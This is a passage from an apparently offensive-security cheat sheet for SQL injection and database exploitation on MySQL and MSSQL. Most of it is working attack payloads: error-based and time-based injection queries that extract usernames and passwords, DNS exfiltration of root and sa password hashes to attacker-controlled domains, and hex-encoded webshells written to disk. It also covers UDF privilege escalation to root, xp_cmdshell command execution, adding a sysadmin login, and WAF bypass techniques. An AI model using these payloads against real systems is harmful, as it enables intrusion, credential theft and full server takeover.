class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(username <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) <span class="keyword">FROM</span> MTN2012.user <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span>),<span class="number">0x7170626271</span>)) <span class="keyword">AND</span> (<span class="string">'JonM'</span>=<span class="string">'JonM;</span></div><div class="line"><span class="string">en'</span>) <span class="keyword">AND</span> EXTRACTVALUE(<span class="number">4230</span>,<span class="keyword">CONCAT</span>(<span class="number">0x34</span>,(<span class="keyword">SELECT</span> <span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(username <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) <span class="keyword">FROM</span> MTN2012.user <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span>))) <span class="keyword">AND</span> (<span class="string">'JonM'</span>=<span class="string">'JonM;</span></div><div class="line"><span class="string">en'</span>) <span class="keyword">AND</span> EXTRACTVALUE(<span class="number">1</span>,(<span class="keyword">select</span> username <span class="keyword">FROM</span> MTN2012.user <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span>)) <span class="keyword">AND</span> (<span class="string">'JonM'</span>=<span class="string">'JonM;</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">where username = 0x6261626e73696969</span></div><div class="line"><span class="string"></span></div><div class="line"><span 
class="string">098f6bcd4621d373cade4e832627b4f6</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">select * from t where name = '</span>c<span class="string">' </span></div><div class="line"><span class="string">and extractvalue(1, </span></div><div class="line"><span class="string">(SELECT string FROM t limit 1,1)</span></div><div class="line"><span class="string">)</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">select extractValue(1,(SELECT string FROM t limit 1,1))</span></div><div class="line"><span class="string">[Err] 1105 - XPATH syntax error: '</span>f6bcd4621d373cade4e832627b4f6<span class="string">'</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">select extractValue(1,(SELECT concat(":",string) FROM t limit 1,1))</span></div><div class="line"><span class="string">[Err] 1105 - XPATH syntax error: '</span>:<span class="number">098</span>f6bcd4621d373cade4e832627b4f<span class="string">'</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">floor</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">select * from t where name = '</span>c<span class="string">' </span></div><div class="line"><span class="string">-- and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) </span></div><div class="line"><span class="string">-- and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x74 LIMIT 0,1)) from information_schema.tables limit 
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">/*</span></div><div class="line"><span class="string">and (select 1 from</span></div><div class="line"><span class="string">(</span></div><div class="line"><span class="string">select count(*),concat(</span></div><div class="line"><span class="string">(SELECT distinct concat(0x23,string) FROM t limit 2,1) -- #a:100684d61405e723#</span></div><div class="line"><span class="string">-- "hkruo"</span></div><div class="line"><span class="string">,floor(rand(0)*2))x from information_schema.tables group by x)a</span></div><div class="line"><span class="string">)</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">*/</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">and (select 1 from </span></div><div class="line"><span class="string">(</span></div><div class="line"><span class="string">select count(*),concat(</span></div><div class="line"><span class="string">(SELECT distinct concat(0x23,string) FROM t limit 2,1) -- #a:100684d61405e723#</span></div><div class="line"><span class="string">,floor(rand(0)*2))x </span></div><div class="line"><span class="string">from information_schema.tables group by x</span></div><div class="line"><span class="string">)b</span></div><div class="line"><span class="string">)</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">and (select 1 from </span></div><div class="line"><span class="string">(</span></div><div class="line"><span class="string">select count(*),concat(</span></div><div class="line"><span class="string">(SELECT distinct concat(0x23,password) FROM admin limit 2,1)</span></div><div class="line"><span class="string">,floor(rand(0)*2))x </span></div><div class="line"><span class="string">from 
information_schema.tables group by x</span></div><div class="line"><span class="string">)b</span></div><div class="line"><span class="string">)</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">en'</span>)+<span class="keyword">and</span>+(<span class="keyword">select</span> <span class="number">1</span> <span class="keyword">from</span> (<span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="keyword">concat</span>((<span class="keyword">SELECT</span> <span class="keyword">distinct</span> <span class="keyword">concat</span>(<span class="number">0x23</span>,<span class="keyword">password</span>) <span class="keyword">FROM</span> <span class="keyword">admin</span> <span class="keyword">limit</span> <span class="number">2</span>,<span class="number">1</span>),<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> x)b) <span class="keyword">and</span> (<span class="string">'JonM'</span>=<span class="string">'JonM</span></div></pre></td></tr></table></figure><h3 id="延时注入"><a href="#延时注入" class="headerlink" title="延时注入"></a>Time-based injection</h3><p>Delay functions<br>MySQL BENCHMARK(100000,MD5(1)) or sleep(5)<br>PostgreSQL PG_SLEEP(5) OR GENERATE_SERIES(1,10000)<br>MSSQL WAITFOR DELAY '0:0:5'</p><p>Query used for the delay test<br>select * from test.t where name = 'a'</p><p>Payload<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">' or If(substr('ruo',1,1) = 'r',sleep(5),0)</div><div class="line">' and if(true,sleep(5),0) # </div><div class="line">' union <span class="keyword">select</span> <span class="keyword">benchmark</span>(<span class="number">500000</span>,<span 
class="keyword">md5</span>(<span class="string">'test'</span>));</div></pre></td></tr></table></figure></p><h3 id="DNS传输数据"><a href="#DNS传输数据" class="headerlink" title="DNS传输数据"></a>Exfiltrating data over DNS</h3><p>Configure the domain<br>A test 153.92.xxx.xxx<br>NS ns1 test.domainname.com</p><p>Statement<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">SELECT</span> <span class="keyword">LOAD_FILE</span>(<span class="keyword">CONCAT</span>(<span class="string">'\\\\'</span>,(<span class="keyword">SELECT</span> <span class="keyword">password</span> <span class="keyword">FROM</span> mysql.user <span class="keyword">WHERE</span> <span class="keyword">user</span>=<span class="string">'root'</span> <span class="keyword">LIMIT</span> <span class="number">1</span>),<span class="string">'.ns1.domainname.com\\foo'</span>));</div></pre></td></tr></table></figure></p><p>Test<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">WHERE</span> <span class="string">`name`</span> = <span class="string">'a'</span> </div><div class="line"><span class="keyword">or</span> <span class="keyword">if</span>((<span class="keyword">SELECT</span> <span class="keyword">LOAD_FILE</span>(<span class="keyword">CONCAT</span>(<span class="string">'\\\\'</span>,(<span class="keyword">SELECT</span> <span class="keyword">hex</span>(<span class="keyword">user</span>())),<span class="string">'.ns1.domainname.com\\foo'</span>))),<span class="number">1</span>,<span class="number">1</span>)</div></pre></td></tr></table></figure></p><p>Receiving the data with dnschef<br><code>[22:29:07] 61.139.113.158: proxying the response of type 'A' for 
726F6F74406C6F63616C686F7374.ns1.domain.com</code></p><blockquote><p>Note</p><ol><li>Consider the case where LOAD_FILE is disabled</li><li>Local DNS cannot resolve the name</li></ol></blockquote><h3 id="文件操作"><a href="#文件操作" class="headerlink" title="文件操作"></a>File operations</h3><blockquote><p>When writing a file or a shell, quote characters may cause errors; in that case the content can be converted to hexadecimal before it is written. If MySQL is configured with the --secure-file-priv option, the use of LOAD DATA, SELECT ... OUTFILE and LOAD_FILE() is restricted.</p></blockquote><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line"><span class="comment">/* write a webshell */</span></div><div class="line"><span class="keyword">select</span> <span class="keyword">hex</span>(<span class="string">'<?php eval($_POST[ru0]);phpinfo();?>'</span>)</div><div class="line"><span class="keyword">select</span> <span class="number">0x3C3F706870206576616C28245F504F53545B7275305D293B706870696E666F28293B3F3E</span> <span class="keyword">into</span> <span class="keyword">outfile</span> <span class="string">'D:/r1.php'</span></div><div class="line"></div><div class="line"><span class="comment">/* decode the hex data back to /etc/passwd */</span></div><div class="line"><span class="keyword">select</span> <span class="keyword">unhex</span>(<span class="string">'2F6574632F706173737764'</span>);</div><div class="line"></div><div class="line"><span class="comment">/* save the file's hex encoding to a text file */</span></div><div class="line"><span class="keyword">select</span> <span class="keyword">hex</span>(<span class="keyword">load_file</span>(<span class="string">'D:/Test/setup.exe'</span>)) <span class="keyword">into</span> <span class="keyword">outfile</span> <span class="string">'D:/Test/hex16f.txt'</span>;</div><div class="line"></div><div class="line"><span class="comment">/* 
export as a binary file */</span></div><div class="line"><span class="keyword">select</span> <span class="number">0x4D5A90000300000004000000</span><span class="comment">/* hex data */</span> <span class="keyword">into</span> <span class="keyword">dumpfile</span> <span class="string">'D:/Test/file.exe'</span>;</div></pre></td></tr></table></figure><blockquote><p>Note</p><ol><li>When writing a program that has been converted to hex back out to a file, use into dumpfile; into outfile cannot be used.</li><li>When exporting, do not forget the 0x prefix at the start of the string.</li></ol></blockquote><h3 id="UDF"><a href="#UDF" class="headerlink" title="UDF"></a>UDF</h3><p>Linux:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div></pre></td><td class="code"><pre><div class="line">$ id</div><div class="line">uid=500(raptor) gid=500(raptor) groups=500(raptor)</div><div class="line">$ gcc -g -c raptor_udf2.c</div><div class="line">$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc</div><div class="line">$ mysql -u root -p</div><div class="line">Enter password:</div><div class="line">[...]</div><div class="line">mysql> use mysql;</div><div class="line">mysql> create table foo(line blob);</div><div class="line">mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));</div><div class="line">mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';</div><div class="line">mysql> create function do_system returns integer soname 'raptor_udf2.so';</div><div 
class="line">mysql> select * from mysql.func;</div><div class="line">+-----------+-----+----------------+----------+</div><div class="line">| name | ret | dl | type |</div><div class="line">+-----------+-----+----------------+----------+</div><div class="line">| do_system | 2 | raptor_udf2.so | function |</div><div class="line">+-----------+-----+----------------+----------+</div><div class="line">mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');</div><div class="line">mysql> \! sh</div><div class="line">sh-2.05b$ cat /tmp/out</div><div class="line">uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)</div><div class="line">[...]</div></pre></td></tr></table></figure></p><p>Windows:</p><p>S1. Compile the UDF</p><p>UDF source code<br><a href="http://www.mysqludf.org/" target="_blank" rel="external">http://www.mysqludf.org/</a><br><a href="https://github.com/sqlmapproject/udfhack" target="_blank" rel="external">https://github.com/sqlmapproject/udfhack</a></p><p>Compile the 32-bit version<br>MySQL: 4.1.22<br>Header files used for compilation: mysql-4.1.22-win32\include</p><p>Put lib_mysqludf_sys.dll into the c:\windows directory; on newer versions put it into the plugin directory (there is a bug: some commands crash the MySQL process).</p><blockquote><p>Important<br>The UDF file location and the creation of the plugin directory via an NTFS stream (select 'xxx' into dumpfile 'C:\WINDOWS\TEMP\plugin::$INDEX_ALLOCATION';) must be tested specifically against the target version.</p></blockquote><p>S2. 
Create the function</p><p>Check the version<br>select version();</p><p>Check the plugin directory path<br>SHOW VARIABLES LIKE '%plugin%'</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">mysql>use mysql;</div><div class="line">mysql>CREATE FUNCTION sys_exec RETURNS string SONAME <span class="string">'lib_mysqludf_sys.dll'</span>;</div><div class="line">mysql>SELECT * from mysql.func;</div><div class="line">+----------+-----+-----------------------+----------+</div><div class="line">| name | ret | dl | <span class="built_in">type</span> |</div><div class="line">+----------+-----+-----------------------+----------+</div><div class="line">| sys_exec | 0 | lib_mysqludf_sys1.dll | <span class="keyword">function</span> |</div><div class="line">+----------+-----+-----------------------+----------+</div><div class="line">mysql>SELECT sys_exec(<span class="string">'whoami > d:/11.txt'</span>);</div><div class="line">mysql>DROP FUNCTION sys_exec;</div></pre></td></tr></table></figure><h3 id="MYSQL-FEDERATED"><a href="#MYSQL-FEDERATED" class="headerlink" title="MYSQL FEDERATED"></a>MYSQL FEDERATED</h3><p>The FEDERATED storage engine lets you access data from a remote MySQL database without using replication or cluster technology. The FEDERATED storage engine is not enabled by default in the running server; to enable FEDERATED, you must start the MySQL server binary using the --federated option.</p><p><img src="https://i.imgur.com/gDDme2b.png" alt=""></p><p>Create FEDERATED Tables</p><p>ST1</p><ol><li>Create the remote table<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div 
class="line">6</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">CREATE</span> <span class="keyword">TABLE</span> <span class="string">`T1`</span>(</div><div class="line"><span class="keyword">id</span> <span class="built_in">INT</span>(<span class="number">20</span>) <span class="keyword">NOT</span> <span class="literal">NULL</span> AUTO_INCREMENT,</div><div class="line"><span class="string">`name`</span> <span class="built_in">VARCHAR</span>(<span class="number">100</span>),</div><div class="line">PRIMARY <span class="keyword">KEY</span> (<span class="keyword">id</span>)</div><div class="line">)</div><div class="line"><span class="keyword">ENGINE</span>=MYISAM;</div></pre></td></tr></table></figure></li></ol><p>ST2</p><ol><li><p>Enable the federated storage engine in my.ini</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">[mysqld]</div><div class="line">federated</div></pre></td></tr></table></figure></li><li><p>Create the FEDERATED table with a CONNECTION string</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">CREATE</span> <span class="keyword">TABLE</span> <span class="string">`T1_FEDERATED`</span>(</div><div class="line"><span class="keyword">id</span> <span class="built_in">INT</span>(<span class="number">20</span>) <span class="keyword">NOT</span> <span class="literal">NULL</span> AUTO_INCREMENT,</div><div class="line"><span class="string">`name`</span> <span class="built_in">VARCHAR</span>(<span class="number">100</span>),</div><div class="line">PRIMARY <span class="keyword">KEY</span> (<span class="keyword">id</span>)</div><div class="line">)</div><div class="line"><span 
class="keyword">ENGINE</span>=FEDERATED</div><div class="line"><span class="keyword">CONNECTION</span>=<span class="string">'mysql://root:password@127.0.0.1:3306/test/T1'</span>;</div></pre></td></tr></table></figure></li></ol><blockquote><p>Note<br>The remote server must be a MySQL server.<br>Care should be taken when creating a FEDERATED table since the index definition from an equivalent MyISAM or other table may not be supported.</p></blockquote><p>How to attack?<br>With the engine enabled, other local tables can be reached through the credentials of another user.</p><h3 id="Restoring-Orphan-File-Per-Table-ibd-Files"><a href="#Restoring-Orphan-File-Per-Table-ibd-Files" class="headerlink" title="Restoring Orphan File-Per-Table ibd Files"></a>Restoring Orphan File-Per-Table ibd Files</h3><p>To recover a database when only the .frm and .ibd files are available (file-per-table tablespaces, innodb_file_per_table=1), first make sure the current server and the database being recovered are the same MySQL version!</p><p>ST1</p><ol><li>Get the table structure<br>Create a database with the same name<br>mysql> CREATE DATABASE dbname;</li><li>Copy the .frm file into the corresponding database directory</li><li>View the table structure<br>mysql> SHOW CREATE TABLE tbname;</li></ol><blockquote><p>Note<br>Alternative way to recover the table structure (recommended)<br>MySQL Utilities<br><a href="https://dev.mysql.com/downloads/utilities/" target="_blank" rel="external">https://dev.mysql.com/downloads/utilities/</a><br>$ mysqlfrm --basedir=/usr/local/bin/mysql test1:db1.frm --port=3333</p></blockquote><p>ST2</p><ol><li>Create the table structure with the exported statement</li><li>Discard the current tablespace<br>mysql> ALTER TABLE dbname.tbname DISCARD TABLESPACE;</li><li>Copy the .ibd file to be recovered into the new database directory (on Linux make sure the .ibd file has suitable permissions)</li><li>Import the .ibd file<br>mysql> ALTER TABLE dbname.tbname IMPORT TABLESPACE; SHOW WARNINGS; </li></ol><h3 id="绕过WAF"><a href="#绕过WAF" class="headerlink" title="绕过WAF"></a>WAF bypass</h3><p>WAF interception flow<br>Data normalization -> rule matching</p><p>Case conversion union -> UnIon<br>Deletion-type filtering union -> unioUNIONn<br><> is equivalent to BETWEEN<br>= is equivalent to like<br>Hex() bin() are equivalent to ascii()<br>Sleep() is equivalent to benchmark()<br>Mid() substring() are equivalent to substr()<br>@@user is equivalent to User()<br>@@Version is equivalent to version()<br>MySQL supports &&, ||<br><code>+ plus sign used as a space</code><br><code>/*Comments*/ comment used as a space</code><br><code>CONCAT/*Comments*/('a','test');</code> // special characters may appear between a function name and its opening parenthesis<br><code>where name = 8E0union select 
'test'</code> // 8.0union select 'test' does not get past the regex match union\sselect<br><code>UNION/*!12345select all*/1,2</code> //union all select 1,2<br>?<br>` acts as a comment<br>union%250Cselect %250C is a whitespace character<br>union%25A0select<br>MySQL ignores unknown encodings</p><blockquote><p>Note<br>Check how MySQL executed the statements through the log<br>Configure my.ini to enable logging<br>[mysqld]<br>log = mysql.log<br>or<br>set global general_log=1;</p></blockquote><h3 id="存储过程"><a href="#存储过程" class="headerlink" title="存储过程"></a>Stored procedures</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">use</span> <span class="keyword">test</span>;</div><div class="line"><span class="keyword">DROP</span> <span class="keyword">PROCEDURE</span> <span class="keyword">IF</span> <span class="keyword">EXISTS</span> <span class="keyword">test</span>;</div><div class="line"><span class="keyword">CREATE</span> <span class="keyword">PROCEDURE</span> <span class="keyword">test</span>()</div><div class="line"><span class="keyword">BEGIN</span></div><div class="line"><span class="keyword">DECLARE</span> i <span class="built_in">INT</span> <span class="keyword">DEFAULT</span> <span class="number">1</span>;</div><div class="line">#SET i=1;</div><div class="line">WHILE i < 3608 DO</div><div class="line">#CREATE TABLE ti(id int) ENGINE=InnoDB;</div><div class="line"><span class="keyword">set</span> @sql_create_table = <span class="keyword">concat</span>(<span class="string">'CREATE TABLE IF NOT EXISTS tb_'</span>,i,<span class="string">'(id int) ENGINE=InnoDB'</span>);</div><div class="line"><span 
class="keyword">PREPARE</span> sql_create_table <span class="keyword">FROM</span> @sql_create_table;</div><div class="line"><span class="keyword">EXECUTE</span> sql_create_table;</div><div class="line"><span class="keyword">SET</span> i=i+<span class="number">1</span>;</div><div class="line"><span class="keyword">END</span> <span class="keyword">WHILE</span>;</div><div class="line"><span class="keyword">END</span>;</div><div class="line"></div><div class="line"><span class="keyword">CALL</span> <span class="keyword">test</span>();</div></pre></td></tr></table></figure><h3 id="备份还原"><a href="#备份还原" class="headerlink" title="备份还原"></a>Backup and restore</h3><p>Dump to an SQL file</p><p>mysqldump -h ip -uroot -pPassword dbname table1 table2 > backup.sql</p><p>mysqlhotcopy</p><p>Restore</p><p>mysql -u root -pPassword dbname < backup.sql</p><blockquote><p>Note<br>If syntax errors or similar appear, raise the maximum packet size<br>mysql> set global max_allowed_packet=268435456;</p></blockquote><h2 id="MSSQL"><a href="#MSSQL" class="headerlink" title="MSSQL"></a>MSSQL</h2><h3 id="常用语句"><a href="#常用语句" class="headerlink" title="常用语句"></a>Common statements</h3><p>Get the database file paths</p><p><code>select database_id,name,physical_name AS CurrentLocation,state_desc,size from sys.master_files where database_id=db_id(N'wx');</code> </p><p>Current database name db_name()<br>Current user user<br>Server name @@SERVERNAME</p><p>Database names</p><p>select name from master.dbo.sysdatabases where dbid=1</p><p>List table names</p><p>select top 1 name from 库名.dbo.sysobjects where xtype='U'</p><p>Look up the id of a table</p><p>select id from sl.dbo.sysobjects where xtype='U' and name='users'</p><p>Query the column names by table id</p><p>select name from sl.dbo.syscolumns where id=1937441976</p><p>Add a role</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">CREATE</span> LOGIN ruo <span class="keyword">WITH</span> <span class="keyword">PASSWORD</span> = <span class="string">'123456'</span>;</div><div class="line">EXEC sp_addsrvrolemember 'ruo', 
'sysadmin'</div></pre></td></tr></table></figure><p>Common functions</p><p>COL_NAME ( table_id , column_id )<br>IS_SRVROLEMEMBER ('sysadmin')<br>IS_MEMBER ('db_owner')<br>EXISTS/NOT EXISTS<br>IN/NOT IN</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="comment">-- iterate over the table names</span></div><div class="line"><span class="keyword">SELECT</span> TOP <span class="number">1</span> <span class="keyword">name</span> <span class="keyword">FROM</span> sl.dbo.sysobjects <span class="keyword">WHERE</span> xtype=<span class="string">'U'</span> </div><div class="line"><span class="keyword">AND</span> <span class="keyword">NAME</span> <span class="keyword">NOT</span> <span class="keyword">IN</span> (<span class="keyword">SELECT</span> TOP N <span class="keyword">NAME</span> <span class="keyword">FROM</span> sl.dbo.sysobjects <span class="keyword">WHERE</span> xtype=<span class="string">'U'</span>)</div></pre></td></tr></table></figure><p>Concatenate multiple rows into one column<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line"><span class="comment">-- get the column names of the table</span></div><div class="line"><span class="keyword">DECLARE</span> @<span class="keyword">col</span> <span class="built_in">varchar</span>(<span class="number">1000</span>)=<span class="string">''</span>;</div><div class="line"><span class="keyword">SELECT</span> @<span class="keyword">col</span> = @<span class="keyword">col</span> + <span class="keyword">name</span> + <span class="string">','</span> <span class="keyword">FROM</span> SysColumns <span class="keyword">WHERE</span> <span class="keyword">id</span>=Object_Id(<span class="string">'Users'</span>);</div><div class="line"><span class="comment">--PRINT 
RTRIM(@col);</span></div></pre></td></tr></table></figure></p><p>SELECT ','+Name FROM SysColumns WHERE id=Object_Id('Users') FOR XML PATH('')</p><p>View the column names of a table<br><code>SELECT COL_NAME(OBJECT_ID('table'), 1)</code></p><p>Guess the column values<br>ascii(substring(COL_NAME(OBJECT_ID('Users'),1),1,1)) > 0 // which column, which character</p><p>UNICODE(SUBSTRING((SELECT%0a ISNULL(CAST(LTRIM(STR(LEN(COL_NAME(OBJECT_ID('table'),1)))) AS NVARCHAR(4000)),CHAR(32))),1,1))>48</p><h3 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>Command execution</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">EXEC sp_configure <span class="string">'show advanced options'</span>,<span class="number">1</span> <span class="comment">-- allow changing advanced options</span></div><div class="line">EXEC sp_configure <span class="string">'xp_cmdshell'</span>,<span class="number">1</span> <span class="comment">-- enable the xp_cmdshell extended procedure</span></div><div class="line">EXEC master..dbo.xp_cmdshell <span class="string">'whoami'</span></div></pre></td></tr></table></figure><h3 id="Public-权限列目录"><a href="#Public-权限列目录" class="headerlink" title="Public 权限列目录"></a>Directory listing with Public permissions</h3><p>Get the directory names under C:<br><code>EXEC master..xp_dirtree 'c:/',1</code></p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">IF OBJECT_ID('tempdb..##DirectoryTree') IS NOT NULL</div><div class="line"> <span class="keyword">DROP</span> <span class="keyword">TABLE</span> ##DirectoryTree;</div><div class="line"></div><div class="line"><span class="keyword">CREATE</span> <span class="keyword">TABLE</span> ##DirectoryTree (</div><div class="line"> <span 
class="keyword">id</span> <span class="built_in">int</span> <span class="keyword">IDENTITY</span>(<span class="number">1</span>,<span class="number">1</span>),</div><div class="line"> subdirectory <span class="keyword">nvarchar</span>(<span class="number">512</span>),</div><div class="line"> <span class="keyword">depth</span> <span class="built_in">int</span>,</div><div class="line"> isfile <span class="built_in">bit</span>);</div><div class="line"></div><div class="line"><span class="keyword">INSERT</span> ##DirectoryTree (subdirectory,<span class="keyword">depth</span>,isfile) EXEC master..xp_dirtree <span class="string">'c:/'</span>,<span class="number">1</span>,<span class="number">1</span>;</div></pre></td></tr></table></figure><p>Exfiltrating data over DNS</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">DECLARE</span> @host <span class="built_in">varchar</span>(<span class="number">1024</span>);</div><div class="line"><span class="keyword">SELECT</span> @host=(<span class="keyword">SELECT</span> TOP <span class="number">1</span> master.dbo.fn_varbintohexstr(password_hash) <span class="keyword">FROM</span> sys.sql_logins <span class="keyword">WHERE</span> <span class="keyword">name</span>=<span class="string">'sa'</span>)+<span class="string">'.attacker.com'</span>;</div><div class="line">EXEC(<span class="string">'master..xp_dirtree "\\'</span>+@host+<span class="string">'\foobar$"'</span>);</div></pre></td></tr></table></figure><h3 id="备份数据库"><a href="#备份数据库" class="headerlink" title="备份数据库"></a>Back up the database</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">BACKUP</span> <span class="keyword">DATABASE</span> database_name </div><div class="line"> <span class="keyword">TO</span> DISK = <span 
class="string">'D:\backup.bak'</span></div></pre></td></tr></table></figure><h3 id="备份还原-1"><a href="#备份还原-1" class="headerlink" title="备份还原"></a>备份还原</h3><p>ST1 创建数据库。<br>ST2 返回由备份集内包含的数据库和日志文件列表组成的结果集。<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">RESTORE</span> FILELISTONLY</div><div class="line"> <span class="keyword">FROM</span> DISK = <span class="string">' D:\Hs.bak '</span></div></pre></td></tr></table></figure></p><p>ST3 还原并指定数据库物理文件名称及路径。<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">RESTORE</span> <span class="keyword">DATABASE</span> database_name </div><div class="line"> <span class="keyword">FROM</span> DISK = <span class="string">'D:\Hs.bak'</span></div><div class="line"><span class="keyword">WITH</span> <span class="keyword">REPLACE</span>,</div><div class="line"><span class="keyword">MOVE</span> <span class="string">'HealthSchoolMIS_Data'</span> <span class="keyword">TO</span> <span class="string">'D:\DATA\HealthSchoolMIS_Data.MDF'</span>,</div><div class="line"><span class="keyword">MOVE</span> <span class="string">'HealthSchoolMIS_Log'</span> <span class="keyword">TO</span> <span class="string">'D:\DATA\HealthSchoolMIS_Log.LDF'</span></div></pre></td></tr></table></figure></p><h3 id="数据库备份shell"><a href="#数据库备份shell" class="headerlink" title="数据库备份shell"></a>数据库备份shell</h3><p>第一次进行全量备份<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">alter</span> <span class="keyword">database</span> database_name <span 
class="keyword">set</span> <span class="keyword">RECOVERY</span> <span class="keyword">FULL</span> //第一次对数据库进行一次全备份</div><div class="line"><span class="keyword">backup</span> <span class="keyword">database</span> database_name <span class="keyword">to</span> disk = <span class="string">'d:\1.asp'</span></div><div class="line"><span class="keyword">BACKUP</span> <span class="keyword">LOG</span> cannot be performed because there <span class="keyword">is</span> <span class="keyword">no</span> <span class="keyword">current</span> <span class="keyword">database</span> backup.</div></pre></td></tr></table></figure></p><p>建立cmd表,并写入值<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">create</span> <span class="keyword">table</span> cmd (a image)</div><div class="line"><span class="keyword">insert</span> <span class="keyword">into</span> cmd (a) <span class="keyword">values</span> (<span class="number">0x3C256576616C20726571756573742822732229253E</span>)</div><div 